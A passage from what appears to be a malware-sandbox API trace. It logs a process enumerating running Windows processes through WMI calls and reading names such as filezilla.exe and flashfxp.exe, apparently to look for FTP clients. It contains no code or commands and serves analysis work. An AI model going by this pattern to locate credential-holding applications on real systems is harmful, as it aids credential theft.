[7]=0x24))) returned 0x0 [0279.373] IUnknown:Release (This=0x57044dc) returned 0x3 [0279.373] IUnknown:QueryInterface (in: This=0x57044d8, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43de8c | out: ppvObject=0x43de8c*=0x0) returned 0x80004002 [0279.373] IUnknown:Release (This=0x57044d8) returned 0x2 [0279.374] IUnknown:QueryInterface (in: This=0x57044d8, riid=0x43e424*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x43e420 | out: ppvObject=0x43e420*=0x57044d8) returned 0x0 [0279.374] IUnknown:AddRef (This=0x57044d8) returned 0x4 [0279.374] IUnknown:Release (This=0x57044d8) returned 0x3 [0279.374] IUnknown:Release (This=0x57044d8) returned 0x2 [0279.374] CoTaskMemFree (pv=0x56fc2f8) [0279.374] IUnknown:AddRef (This=0x57044d8) returned 0x3 [0279.374] IWbemClassObject:Get (in: This=0x57044d8, wszName="__GENUS", lFlags=0, pVal=0x43ea64*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eae4*=0, plFlavor=0x43eae0*=0 | out: pVal=0x43ea64*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x43eae4*=3, plFlavor=0x43eae0*=64) returned 0x0 [0279.375] IWbemClassObject:Get (in: This=0x57044d8, wszName="__PATH", lFlags=0, pVal=0x43ea48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eacc*=0, plFlavor=0x43eac8*=0 | out: pVal=0x43ea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2872\"", varVal2=0x0), pType=0x43eacc*=8, plFlavor=0x43eac8*=64) returned 0x0 [0279.375] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2872\"") returned 0x66 [0279.375] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2872\"") returned 0x66 [0279.375] CoGetObjectContext (in: riid=0x277dff0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43ea74 | out: ppv=0x43ea74*=0x500344) returned 0x0 [0279.375] IComThreadingInfo:GetCurrentApartmentType (in: This=0x500344, pAptType=0x43ea6c | out: pAptType=0x43ea6c*=1) returned 0x0 [0279.375] IUnknown:QueryInterface (in: This=0x500344, riid=0x277dfcc*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x43ea70 | out: ppvObject=0x43ea70*=0x0) returned 0x80004002 [0279.375] IUnknown:Release (This=0x500344) returned 0x1 [0279.376] CoGetClassObject (in: rclsid=0x5aa304*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43e3e0 | out: ppv=0x43e3e0*=0x56fc2f8) returned 0x0 [0279.376] WbemDefPath:IUnknown:QueryInterface (in: This=0x56fc2f8, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43e5f8 | out: ppvObject=0x43e5f8*=0x0) returned 0x80004002 [0279.376] WbemDefPath:IClassFactory:CreateInstance (in: This=0x56fc2f8, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e604 | out: ppvObject=0x43e604*=0x5702890) returned 0x0 [0279.376] WbemDefPath:IUnknown:Release (This=0x56fc2f8) returned 0x0 [0279.376] WbemDefPath:IUnknown:QueryInterface (in: This=0x5702890, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e224 | out: ppvObject=0x43e224*=0x5702890) returned 0x0 [0279.376] WbemDefPath:IUnknown:QueryInterface (in: This=0x5702890, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e1d8 | out: ppvObject=0x43e1d8*=0x0) returned 0x80004002 [0279.377] WbemDefPath:IUnknown:AddRef (This=0x5702890) returned 0x3 [0279.377] WbemDefPath:IUnknown:QueryInterface (in: This=0x5702890, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43db34 | out: ppvObject=0x43db34*=0x0) returned 0x80004002 [0279.377] WbemDefPath:IUnknown:QueryInterface (in: This=0x5702890, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43dae4 | out: ppvObject=0x43dae4*=0x0) returned 0x80004002 [0279.377] WbemDefPath:IUnknown:QueryInterface (in: This=0x5702890, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43daf0 | out: ppvObject=0x43daf0*=0x570af08) returned 0x0 [0279.377] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x570af08, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43daf8 | out: pCid=0x43daf8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0279.377] WbemDefPath:IUnknown:Release (This=0x570af08) returned 0x3 [0279.378] WbemDefPath:IUnknown:QueryInterface (in: This=0x5702890, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43dfe4 | out: ppvObject=0x43dfe4*=0x0) returned 0x80004002 [0279.378] WbemDefPath:IUnknown:Release (This=0x5702890) returned 0x2 [0279.378] WbemDefPath:IUnknown:Release (This=0x5702890) returned 0x1 [0279.378] WbemDefPath:IUnknown:QueryInterface (in: This=0x5702890, riid=0x43e924*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x43e920 | out: ppvObject=0x43e920*=0x5702890) returned 0x0 [0279.378] WbemDefPath:IUnknown:AddRef (This=0x5702890) returned 0x3 [0279.378] WbemDefPath:IUnknown:Release (This=0x5702890) returned 0x2 [0279.378] WbemDefPath:IWbemPath:SetText (This=0x5702890, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2872\"") returned 0x0 [0279.378] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43eaa0 | out: puCount=0x43eaa0*=0x2) returned 0x0 [0279.378] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0x0, pszText=0x0 | out: puBuffLength=0x43ea9c*=0xf, pszText=0x0) returned 0x0 [0279.378] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea9c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.378] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43ea6c | out: puCount=0x43ea6c*=0x2) returned 0x0 [0279.378] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0x0, pszText=0x0 | out: puBuffLength=0x43ea68*=0xf, pszText=0x0) returned 0x0 [0279.379] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea68*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.379] IWbemClassObject:Get (in: This=0x57044d8, wszName="Name", lFlags=0, pVal=0x43ea68*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27c97f8*=0, plFlavor=0x27c97fc*=0 | out: pVal=0x43ea68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="filezilla.exe", varVal2=0x0), pType=0x27c97f8*=8, plFlavor=0x27c97fc*=0) returned 0x0 [0279.379] SysStringByteLen (bstr="filezilla.exe") returned 0x1a [0279.379] SysStringByteLen (bstr="filezilla.exe") returned 0x1a [0279.379] IWbemClassObject:Get (in: This=0x57044d8, wszName="Name", lFlags=0, pVal=0x43ea70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27c97f8*=8, plFlavor=0x27c97fc*=0 | out: pVal=0x43ea70*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="filezilla.exe", varVal2=0x0), pType=0x27c97f8*=8, plFlavor=0x27c97fc*=0) returned 0x0 [0279.379] SysStringByteLen (bstr="filezilla.exe") returned 0x1a [0279.379] SysStringByteLen (bstr="filezilla.exe") returned 0x1a [0279.379] CoTaskMemAlloc (cb=0x4) returned 0x570af38 [0279.379] IEnumWbemClassObject:Next (in: This=0x5115f8, lTimeout=-1, uCount=0x1, apObjects=0x570af38, puReturned=0x27bb39c | out: apObjects=0x570af38*=0x5704670, puReturned=0x27bb39c*=0x1) returned 0x0 [0279.380] IUnknown:QueryInterface (in: This=0x5704670, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e0cc | out: ppvObject=0x43e0cc*=0x5704670) returned 0x0 [0279.381] IUnknown:QueryInterface (in: This=0x5704670, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e080 | out: ppvObject=0x43e080*=0x0) returned 0x80004002 [0279.381] IUnknown:QueryInterface (in: This=0x5704670, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43dea8 | out: ppvObject=0x43dea8*=0x0) returned 0x80004002 [0279.381] IUnknown:AddRef (This=0x5704670) returned 0x3 [0279.381] IUnknown:QueryInterface (in: This=0x5704670, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43d9dc | out: ppvObject=0x43d9dc*=0x0) returned 0x80004002 [0279.381] IUnknown:QueryInterface (in: This=0x5704670, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43d98c | out: ppvObject=0x43d98c*=0x0) returned 0x80004002 [0279.381] IUnknown:QueryInterface (in: This=0x5704670, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43d998 | out: ppvObject=0x43d998*=0x5704674) returned 0x0 [0279.381] IMarshal:GetUnmarshalClass (in: This=0x5704674, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43d9a0 | out: pCid=0x43d9a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0279.381] IUnknown:Release (This=0x5704674) returned 0x3 [0279.382] IUnknown:QueryInterface (in: This=0x5704670, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43de8c | out: ppvObject=0x43de8c*=0x0) returned 0x80004002 [0279.382] IUnknown:Release (This=0x5704670) returned 0x2 [0279.382] IUnknown:QueryInterface (in: This=0x5704670, riid=0x43e424*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x43e420 | out: ppvObject=0x43e420*=0x5704670) returned 0x0 [0279.382] IUnknown:AddRef (This=0x5704670) returned 0x4 [0279.382] IUnknown:Release (This=0x5704670) returned 0x3 [0279.382] IUnknown:Release (This=0x5704670) returned 0x2 [0279.382] CoTaskMemFree (pv=0x570af38) [0279.383] IUnknown:AddRef (This=0x5704670) returned 0x3 [0279.383] IWbemClassObject:Get (in: This=0x5704670, wszName="__GENUS", lFlags=0, pVal=0x43ea64*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eae4*=0, plFlavor=0x43eae0*=0 | out: pVal=0x43ea64*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x43eae4*=3, plFlavor=0x43eae0*=64) returned 0x0 [0279.383] IWbemClassObject:Get (in: This=0x5704670, wszName="__PATH", lFlags=0, pVal=0x43ea48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eacc*=0, plFlavor=0x43eac8*=0 | out: pVal=0x43ea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2880\"", varVal2=0x0), pType=0x43eacc*=8, plFlavor=0x43eac8*=64) returned 0x0 [0279.383] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2880\"") returned 0x66 [0279.383] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2880\"") returned 0x66 [0279.383] CoGetObjectContext (in: riid=0x277dff0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43ea74 | out: ppv=0x43ea74*=0x500344) returned 0x0 [0279.383] IComThreadingInfo:GetCurrentApartmentType (in: This=0x500344, pAptType=0x43ea6c | out: pAptType=0x43ea6c*=1) returned 0x0 [0279.383] IUnknown:QueryInterface (in: This=0x500344, riid=0x277dfcc*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x43ea70 | out: ppvObject=0x43ea70*=0x0) returned 0x80004002 [0279.383] IUnknown:Release (This=0x500344) returned 0x1 [0279.384] CoGetClassObject (in: rclsid=0x5aa304*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43e3e0 | out: ppv=0x43e3e0*=0x570af38) returned 0x0 [0279.385] WbemDefPath:IUnknown:QueryInterface (in: This=0x570af38, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43e5f8 | out: ppvObject=0x43e5f8*=0x0) returned 0x80004002 [0279.385] WbemDefPath:IClassFactory:CreateInstance (in: This=0x570af38, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e604 | out: ppvObject=0x43e604*=0x5702970) returned 0x0 [0279.385] WbemDefPath:IUnknown:Release (This=0x570af38) returned 0x0 [0279.385] WbemDefPath:IUnknown:QueryInterface (in: This=0x5702970, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e224 | out: ppvObject=0x43e224*=0x5702970) returned 0x0 [0279.385] WbemDefPath:IUnknown:QueryInterface (in: This=0x5702970, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e1d8 | out: ppvObject=0x43e1d8*=0x0) returned 0x80004002 [0279.385] WbemDefPath:IUnknown:AddRef (This=0x5702970) returned 0x3 [0279.385] WbemDefPath:IUnknown:QueryInterface (in: This=0x5702970, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43db34 | out: ppvObject=0x43db34*=0x0) returned 0x80004002 [0279.385] WbemDefPath:IUnknown:QueryInterface (in: This=0x5702970, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43dae4 | out: ppvObject=0x43dae4*=0x0) returned 0x80004002 [0279.385] WbemDefPath:IUnknown:QueryInterface (in: This=0x5702970, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43daf0 | out: ppvObject=0x43daf0*=0x570af48) returned 0x0 [0279.385] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x570af48, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43daf8 | out: pCid=0x43daf8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0279.385] WbemDefPath:IUnknown:Release (This=0x570af48) returned 0x3 [0279.386] WbemDefPath:IUnknown:QueryInterface (in: This=0x5702970, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43dfe4 | out: ppvObject=0x43dfe4*=0x0) returned 0x80004002 [0279.386] WbemDefPath:IUnknown:Release (This=0x5702970) returned 0x2 [0279.386] WbemDefPath:IUnknown:Release (This=0x5702970) returned 0x1 [0279.386] WbemDefPath:IUnknown:QueryInterface (in: This=0x5702970, riid=0x43e924*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x43e920 | out: ppvObject=0x43e920*=0x5702970) returned 0x0 [0279.386] WbemDefPath:IUnknown:AddRef (This=0x5702970) returned 0x3 [0279.386] WbemDefPath:IUnknown:Release (This=0x5702970) returned 0x2 [0279.386] WbemDefPath:IWbemPath:SetText (This=0x5702970, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2880\"") returned 0x0 [0279.386] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43eaa0 | out: puCount=0x43eaa0*=0x2) returned 0x0 [0279.386] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0x0, pszText=0x0 | out: puBuffLength=0x43ea9c*=0xf, pszText=0x0) returned 0x0 [0279.387] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea9c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.387] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43ea6c | out: puCount=0x43ea6c*=0x2) returned 0x0 [0279.387] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0x0, pszText=0x0 | out: puBuffLength=0x43ea68*=0xf, pszText=0x0) returned 0x0 [0279.387] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea68*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.387] IWbemClassObject:Get (in: This=0x5704670, wszName="Name", lFlags=0, pVal=0x43ea68*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27ca078*=0, plFlavor=0x27ca07c*=0 | out: pVal=0x43ea68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="flashfxp.exe", varVal2=0x0), pType=0x27ca078*=8, plFlavor=0x27ca07c*=0) returned 0x0 [0279.387] SysStringByteLen (bstr="flashfxp.exe") returned 0x18 [0279.387] SysStringByteLen (bstr="flashfxp.exe") returned 0x18 [0279.388] IWbemClassObject:Get (in: This=0x5704670, wszName="Name", lFlags=0, pVal=0x43ea70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27ca078*=8, plFlavor=0x27ca07c*=0 | out: pVal=0x43ea70*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="flashfxp.exe", varVal2=0x0), pType=0x27ca078*=8, plFlavor=0x27ca07c*=0) returned 0x0 [0279.388] SysStringByteLen (bstr="flashfxp.exe") returned 0x18 [0279.388] SysStringByteLen (bstr="flashfxp.exe") returned 0x18 [0279.388] CoTaskMemAlloc (cb=0x4) returned 0x570af78 [0279.388] IEnumWbemClassObject:Next (in: This=0x5115f8, lTimeout=-1, uCount=0x1, apObjects=0x570af78, puReturned=0x27bb39c | out: apObjects=0x570af78*=0x5704808, puReturned=0x27bb39c*=0x1) returned 0x0 [0279.389] IUnknown:QueryInterface (in: This=0x5704808, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e0cc | out: ppvObject=0x43e0cc*=0x5704808) returned 0x0 [0279.389] IUnknown:QueryInterface (in: This=0x5704808, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e080 | out: ppvObject=0x43e080*=0x0) returned 0x80004002 [0279.389] IUnknown:QueryInterface (in: This=0x5704808, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43dea8 | out: ppvObject=0x43dea8*=0x0) returned 0x80004002 [0279.389] IUnknown:AddRef (This=0x5704808) returned 0x3 [0279.389] IUnknown:QueryInterface (in: This=0x5704808, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43d9dc | out: ppvObject=0x43d9dc*=0x0) returned 0x80004002 [0279.389] IUnknown:QueryInterface (in: This=0x5704808, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43d98c | out: ppvObject=0x43d98c*=0x0) returned 0x80004002 [0279.389] IUnknown:QueryInterface (in: This=0x5704808, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43d998 | out: ppvObject=0x43d998*=0x570480c) returned 0x0 [0279.389] IMarshal:GetUnmarshalClass (in: This=0x570480c, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43d9a0 | out: pCid=0x43d9a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0279.390] IUnknown:Release (This=0x570480c) returned 0x3 [0279.390] IUnknown:QueryInterface (in: This=0x5704808, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43de8c | out: ppvObject=0x43de8c*=0x0) returned 0x80004002 [0279.390] IUnknown:Release (This=0x5704808) returned 0x2 [0279.390] IUnknown:QueryInterface (in: This=0x5704808, riid=0x43e424*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, 